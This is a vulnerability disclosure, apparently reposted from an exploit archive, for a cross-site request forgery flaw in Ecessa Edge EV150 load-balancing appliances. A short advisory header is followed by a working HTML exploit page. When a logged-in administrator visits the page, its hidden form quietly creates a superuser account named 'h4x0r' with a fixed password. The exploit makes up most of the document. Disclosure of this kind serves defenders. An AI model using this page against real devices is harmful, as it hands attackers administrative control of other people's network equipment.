Ecessa Edge EV150 10.7.4 Add Superuser Cross Site Request Forgery

Ecessa Edge EV150 version 10.7.4 suffers from an add superuser cross site request forgery vulnerability.

MD5 | 32235352c43c1764ff3761997d4f28eb

<!--

Ecessa Edge EV150 10.7.4 CSRF Add Superuser Exploit


Vendor: Ecessa Corporation
Product web page: https://www.ecessa.com
Affected version: 10.7.4
                  10.6.9
                  10.7.4
                  10.6.5.2
                  10.5.4
                  10.2.24
                  9.2.24

Summary: Internet Failover and Load Balancing for Small Businesses, Stores
and Branch Offices.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: lighttpd/1.4.35


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2018-5474
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5474.php


21.05.2018

-->


<html>
  <body>
    <form action="https://127.0.0.1/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
      <input type="hidden" name="savecrtcfg" value="checked" />
      <input type="hidden" name="user_username1" value="root" />
      <input type="hidden" name="user_enabled1" value="on" />
      <input type="hidden" name="user_passwd1" value="" />
      <input type="hidden" name="user_passwd_verify1" value="" />
      <input type="hidden" name="user_delete1" value="" />
      <input type="hidden" name="user_username2" value="admin" />
      <input type="hidden" name="user_passwd2" value="" />
      <input type="hidden" name="user_passwd_verify2" value="" />
      <input type="hidden" name="user_delete2" value="" />
      <input type="hidden" name="user_username3" value="user" />
      <input type="hidden" name="user_enabled3" value="on" />
      <input type="hidden" name="user_passwd3" value="" />
      <input type="hidden" name="user_passwd_verify3" value="" />
      <input type="hidden" name="user_delete3" value="" />
      <input type="hidden" name="user_username4" value="h4x0r" />
      <input type="hidden" name="user_enabled4" value="on" />
      <input type="hidden" name="user_superuser4" value="on" />
      <input type="hidden" name="user_passwd4" value="123123" />
      <input type="hidden" name="user_passwd_verify4" value="123123" />
      <input type="hidden" name="users_num" value="4" />
      <input type="hidden" name="page" value="util_configlogin" />
      <input type="hidden" name="val_requested_page" value="user_accounts" />
      <input type="hidden" name="savecrtcfg" value="checked" />
      <input type="hidden" name="page_uuid" value="3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d" />
      <input type="hidden" name="form_has_changed" value="1" />
      <input type="submit" value="Supersize!" />
    </form>
  </body>
</html>

Source: packetstormsecurity.com

Exploit Collector

Search Exploit

Ecessa Edge EV150 10.7.4 Add Superuser Cross Site Request Forgery